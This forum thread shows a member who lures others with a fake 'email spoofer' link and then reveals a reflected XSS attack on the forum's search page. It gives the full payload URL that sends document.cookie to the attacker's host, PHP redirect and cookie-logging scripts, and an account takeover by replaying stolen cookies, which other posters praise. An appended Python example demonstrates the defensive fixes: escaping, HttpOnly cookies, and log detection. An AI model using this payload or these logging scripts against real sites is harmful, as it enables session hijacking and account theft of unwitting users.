
Thread: Test my email spoofer

  1. #1
    Join Date
    Sep 2005
    Posts
    2,050

    Test my email spoofer

    I signed up a fake account on netfast.org to share some files anonymously, and today coded an email spoofer to test their php hosting. Please test this tool and report to me any problems with it, and I will make more web-tools if this works ok.

    [url]http://a5e6sf5.netfast.org/newpage.php[/url]

  2. #2
    Join Date
    Sep 2006
    Posts
    32
    Um, that link just redirects to the all-net tools forum.

  3. #3
    Join Date
    Sep 2005
    Posts
    2,050
    Quote Originally Posted by tocksarcle
    Um, that link just redirects to the all-net tools forum.
    Are you sure? It worked for me when I tried it...

  4. #4
    Join Date
    Jan 2005
    Posts
    623
    Do you like your cookies served with milk?

    This is the same method myspace spammers use to hijack sessions and create fake posts like "GET *000 FRIEND INSTANTLY". Once a user logged onto myspace goes to this website and tries to "GET *000 FRIENDS INSTANTLY", it creates a bulletin for that user saying "GET *000 FRIENDS INSTANTLY"... And the cycle begins ~ Quick way to make a few bucks using google ads though
    Last edited by SyntaXmasteR; 09-13-2006 at 01:46 PM.
    [url=http://www.syntax******.info/tools/services.php]Speed Up Windows XP[/url]
    [url=http://www.syntax******.info/tools/ip.php]Get An Ip Address[/url]
    [url=http://www.syntax******.info/tools/base_converter.php]Base Converter[/url]
    --------------------------------
    [URL=http://www.boninroad.com/syntax******/]Old Site[/URL]
    [URL=http://www.syntax******.info]Comming Soon[/URL]

  5. #5
    Join Date
    Sep 2005
    Posts
    2,050
    Haha, ok, well I admit there was no email spoofer, or indeed any 'website'.

    Two days ago I tried to search this website and realised that they don't filter any input on the search. I spent a few minutes examining the source code after a search, and noticed that between the '<title>' and '</title>' tags, user input is displayed without any server-side modifications. So, if you enter this code in the search box:

    </title></head><body><script>alert("xss hole here");</script>

    Or any other query preceded by '</title></head><body>', you can enter custom code into the browser of the user who clicks the link. Two minutes later, I signed up a netfast account to test this and coded two simple php scripts to automate things. Once a user clicks the link to 'newpage.php', this happens:

    Link -> newpage.php -> all-nettools.com search with exploit -> write.php -> all-nettools.com/forum/

    The link takes them to newpage.php on my website, newpage.php redirects them to the malicious URL, that redirects them to write.php on my website with 'ck' variable set as their cookie, write.php writes their info to a text file, and they are redirected to the forum index. Here is the full URL I used:

    http://www.all-nettools.com/cgi-bin/search.cgi?q=</title></head><body><script>window.location="http://a5e6sf5.netfast.org/write.php?ck="%2bdocument.cookie;</script>&cmd=Search



    [PHP]newpage.php source:

    <?php
    header("Location: http://www.all-nettools.com/cgi-bin/search.cgi?q=</title></head><body><script>window.location=\"http://a5e6sf5.netfast.org/write.php?ck=\"%2bdocument.cookie;</script>&cmd=Search");
    ?>[/PHP]

    [PHP]write.php source:

    <?php
    $text = "\r\n\r\n-> Date: " . date('r') . "\r\n-> User's IP Address: " . $_SERVER["REMOTE_ADDR"] . "\r\n-> Referrer: " . $_SERVER['HTTP_REFERER'] . "\r\n-> User Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\r\n-> Cookie:\r\n\r\n" . $_GET["ck"] . " \r\n\r\n============================================================================================ ===========================";
    $filehandle = fopen("[FILENAMEREMOVED]", "a");
    fwrite($filehandle, $text);
    fclose($filehandle);
    header("Location: http://www.all-nettools.com/forum/index.php");
    ?>[/PHP]

    Here is the file which accumulated the cookie information (my IP address and users' password hashes have been removed):

    Last edited by Ezekiel; 09-13-2006 at 02:30 PM.

  7. #7
    Join Date
    Sep 2005
    Posts
    2,050
    One thing I need to say is this was not for malicious purposes - it was simply to test if it worked, prove how insecure most websites are, and to post back results here. I have no desire to steal the passwords of forum users, it was just an experiment. I was going to notify the admins of this website, but I get the feeling they don't reply to emails.

    To anybody who clicked that link - I will never log into your account other than to test the cookie and I will not read any private messages, but of course you will not believe me so I advise you to change your password now, and you can be free from paranoia. But of all the people who clicked the link, so far only one was a logged-in user. I will post below with that account to confirm this.

    Oh, and the tools I used can be seen below:
    • Firefox
    • GFTP
    • A Text Editor
    • Add 'n Edit Cookies (firefox extension)
    • Netfast.org Account

    I simply looked at the cookie log file then used the firefox extension to add two cookie values, bbpassword and bbuserid, each with info from the user.
    Last edited by Ezekiel; 09-13-2006 at 02:42 PM.
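
Added example, not part of the thread and not the forum's own code: the defender's side of the hole described in posts #5 and #7, showing the search term encoded before it is written into `<title>`, the session cookie marked HttpOnly so page script cannot read it, and a log check for search requests that carry markup. The page template, the `forum.example` host and the cookie value are constructed assumptions; the test string is the alert example from post #5.

```python
import html
from html.parser import HTMLParser
from http.cookies import SimpleCookie
from urllib.parse import parse_qs, urlsplit

# Constructed template: the search term is echoed inside <title>, as the
# post describes. The surrounding markup is an assumption.
TEMPLATE = ("<html><head><title>Search results for {q}</title></head>"
            "<body><p>No results.</p></body></html>")

# The harmless alert string quoted in post #5, used here as test input.
PAYLOAD = '</title></head><body><script>alert("xss hole here");</script>'


def render_unescaped(query: str) -> str:
    """'Before': user input is written into the page with no encoding."""
    return TEMPLATE.format(q=query)


def render_escaped(query: str) -> str:
    """'After': HTML-encode the value before it reaches the page."""
    return TEMPLATE.format(q=html.escape(query, quote=True))


class ScriptFinder(HTMLParser):
    """Counts the <script> start tags an HTML parser finds in a document."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.scripts = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1


def script_elements(page: str) -> int:
    finder = ScriptFinder()
    finder.feed(page)
    finder.close()
    return finder.scripts


def session_cookie_header(name: str, value: str) -> str:
    """Set-Cookie value with HttpOnly, so document.cookie cannot expose it."""
    cookie = SimpleCookie()
    cookie[name] = value
    cookie[name]["path"] = "/"
    cookie[name]["httponly"] = True
    cookie[name]["secure"] = True
    cookie[name]["samesite"] = "Lax"
    return cookie[name].OutputString()


def query_carries_markup(url: str, param: str = "q") -> bool:
    """Flag a logged request whose search parameter decodes to HTML tags."""
    values = parse_qs(urlsplit(url).query).get(param, [])
    return any(script_elements(v) > 0 or "</title" in v.lower() for v in values)


# Constructed access-log URLs (hypothetical host).
SUSPICIOUS_URL = ("http://forum.example/cgi-bin/search.cgi?q=%3C/title%3E%3C/head%3E"
                  "%3Cbody%3E%3Cscript%3Ealert(%22xss%20hole%20here%22);%3C/script%3E"
                  "&cmd=Search")
BENIGN_URL = "http://forum.example/cgi-bin/search.cgi?q=port+scanner&cmd=Search"

if __name__ == "__main__":
    print("script tags, unescaped:", script_elements(render_unescaped(PAYLOAD)))
    print("script tags, escaped:  ", script_elements(render_escaped(PAYLOAD)))
    print("Set-Cookie:", session_cookie_header("bbsessionhash", "constructedvalue"))
    for url in (SUSPICIOUS_URL, BENIGN_URL):
        print(query_carries_markup(url), url)
```

Encoding closes the injection itself; HttpOnly only limits what an injected script could read, so it complements the fix rather than replacing it.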

  8. #8
    Join Date
    Aug 2006
    Posts
    233
    Account hacked by mike*0*.

  9. #9
    Join Date
    Mar 2006
    Posts
    122
    Very awesome.
    I'm logged on there * times..
    Oh well,

    T

  10. #10
    Join Date
    Sep 2006
    Posts
    6
    pretty remarkable

  11. #11
    Join Date
    Jan 2006
    Posts
    153
    Nice job man, proving once again that the simple act of clicking a link can often be your downfall.. it doesn't even have to be in php, simple js can also suffice as well.

    rock on!
